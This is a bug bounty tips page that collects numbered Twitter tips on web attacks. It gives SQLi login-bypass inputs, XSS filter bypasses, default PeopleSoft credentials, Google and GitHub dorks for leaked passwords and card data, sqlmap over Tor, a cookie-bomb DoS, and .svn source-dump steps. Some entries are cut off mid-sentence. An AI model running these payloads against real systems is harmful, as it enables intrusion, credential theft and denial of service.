Bounty Tips Collected From Twitter

Tip 1

Here’s my last finding (P1)
1- register account
2- intercept request
3- here’s the response in image so in “role” parameter we have ROLE_USER
So i don’t know what i can replace it to privilege my account to admin
4- open source code and look in js files
5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “a
6- so i use match and replace to replace value’s
7- boom privilege my account to admin account with full control

Tip 3

CloudFront bypass: “>%0D%0A%0D%0A<x ‘=”foo”> Would be interested to know if this is target specific or other CloudFront websites are vulnerabl

Tip 4

1 : Get all the URL from wayback / Gau
2 : Filter out the js file using httpx
3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extens

Tip 5

target.com/wp-config.php => 404 not found
target.com/wp-config.php.… ==> 200 ok and downloaded
wp-config.php.swp ==>>200 ok
after that if its contain encoded using hexadecimal decode it .

Tip 6

try testing for SQLi Authentication Bypass :
username:’–‘/”–“
password:’–‘/”–“

Tip 7

default credentials:
PSADMIN:PSADMIN
PS:PS
PSEM:PSEM
Google Dork: intitle:”Oracle+PeopleSoft+Sign-in”
Wrote a nuclei template to test all permutations

Tip 8

nmap -sV -iL host.txt -oN nmap_scan.txt
Wait a few hours
cat nmap_scan.txt | grep open

Tip 9

Xss payload
https://github.com/Aacle/xss_payload
——————————————
——————————————
Use Nuclei for leaked api.
$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}
——————————————
——————————————
#Scan through #TOR
sqlmap -u “http://target_server/” –tor –tor-type=SOCKS5
——————————————
——————————————
Tip: – always check company’s/Organization employees GitHub account for leaked ghp_ token,
and check access to each repo of main organization
——————————————
——————————————
bypass alert ==> [alert][0].call(this,1)
——————————————
——————————————

Tip 10

1_ Go to SHODAN and get the IP
2 _ Go to Dirsearch and do a Fuzzing
3_ Obtaining sensitive data

Tip 11

Recon Recon Recon!!
Shodan Dorking Always wins.
ssl:”Company Inc”
Filter results by http title.
Start fuzzing an interesting asset.
Found swagger-ui/
Tried swagger ui xss with
https://github.com/seanmarpo/webjars-swagger-xss

Tip 12

Have you ever heard about wc-db file disclosure?!
> you can check it by:
https://target[.]com/.svn/wc.db
> then you can use this tool to dump all of the website source code
https://github.com/anantshri/svn-extractor

Tip 13

1. Shodan Dork -> Some Assets.
2. Fuzzing & got 403 Forbidden on /config dir.
3. Fuzzing on /config/FUZZ and getting some config files.
4. Same pattern and it works on another asset.

 Tip 14 

Default Credentials admin:admin – shodan dork : – ssl:”target[.]com” 200 http.title:”dashboard”

 [ ] Tip 15

 A quick thread about JIRA misconfiguration that I tried today. 3. Google dorks to find jira dashboards. inurl:/ConfigurePortalPages!default.jspa?view=popular 4. Google dork to find jira filters page. inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the pub

 [ ] Tip 16 

5. Google dork to find the exposed user list. inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log 

[ ] Tip 17

 GitHub Recon Tip: look for CSV files that have a high chance of containing confidential informati dork: “org:company extension:csv admin” leak: “cc number, cvv, email, phone number” 

[ ] Tip 18

 Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox: cat targets | waybackurls | anew | grep “=” | gf xss | nilo | gxss -p test | dalfox pipe –skip-b

 [ ] Tip 19

 Tip : “GET request for XML not found” changes the request to POST with XXE payload

 [ ] Tip 20 

Extract Juicy Info From AlienVault for sub in $(cat HOSTS.txt); do gron “https://otx.alienvault.com/otxapi/indicator/hostname/url_li 

[ ] Tip 21

 bypass PHPMYADMIN phpmyadmin =>301 PHPmyadmin =>200 PHPMYadmin =>200 PHPMYADMIN =>200 phpMYadmin =>200 phpmyAdmin =>200

 [ ] Tip 22

 SVN 1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403 2. found http://url.com/.svn/ 3. clone & use https://github.com/anantshri/svn-extractor 4. ./svn-extractor.py –url http://url.com –match database.php 5. result in output dir and just open it

 [ ] Tip 23 

xss in : firstname: ========================== 1:- Use https://github.com/Leoid/MatchandReplace 2:- Import to burpsuite match and replace. 3:- Run gospider. gospider -s url -a -w –sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080 4:- The Blind xss payload will added automatically by burp and gospider. Finally:- 4 BLIND XSS REPORTS.

 [ ] Tip 24

 Cookie Bomb URL that causes the cookie length to exceed request header limits for all requests until the cook 1. Find a Cookie set by a parameter 2. Inject as many commas as you can into the parameter until you DoS that user

 [ ] Tip 25 

xss via jwt 1. Make a jwt token and insert a xss paylaod. 2. The final url is like url/dest?jwt=vulnerable-jwt-token. (jwt= paramter was decoding the provided jwt token and show’s it into the page).

 [ ] Tip 26

 Getting Private Information URLs by curling 1. Grab all URLs from your target which you think hard to hunt or test or static 2. Save all files in any.txt 3. Command : for i in $(cat any.txt); do curl “$i” >> output.txt; done 4. All curled response grep for following Keywords: drive. google docs. google /spreadsheets/d/ /document/d/ NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later You will get URLs includes juicy information

 [ ] Tip 26

 Injecting Payload In Phone Numbers field https://twitter.com/Pwn2arn/status/1609146484263641089 

[ ] Tip 27

 Easy P1 upside_down_face 1: Collect all the Js files by using the developer tool on mozila 2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool 3: Now check manually sensitive keyword js file

 [ ] Tip 28 

Tips for my last P1 : 1 – Found dev portal for developing require Basic Auth 2 – search in GitHub “domain” docker 3- found a user try to pull the privite repository and passing the username:pass 4 – Decode Base64 Basic Auth 5 – Logged in and full access on all Prod 

[ ] Tip 29

 Github leak for Aws,jira,okta etc 1. Org:”target” pwd/pass/passwd/password 2. “target. atlassian” pwd/pass/passwd/password 3. “target. okta” pwd/pass/passwd/password 4. “Jira. target” pwd/pass/passwd/password

 [ ] Tip 30

 soucremap js https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f https://github.com/rarecoil/unwebpack-sourcemap

 [ ] Tip 31

 if a site uses AngularJS, test {{7*7}} to see whether 49 is rendered anywhere. If the application is built with ASP.NET with XSS protection enabled, you might want to focus on testing other vulnerability types first and check for XSS as a last resort. AngularJS Client-Side Template Injection https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXU 

[ ] Tip 32

 If a site is built with Rails, you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pa www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might priori insecure direct object reference vulnerabilities because this vulnerability type is easy for dev

Leave a comment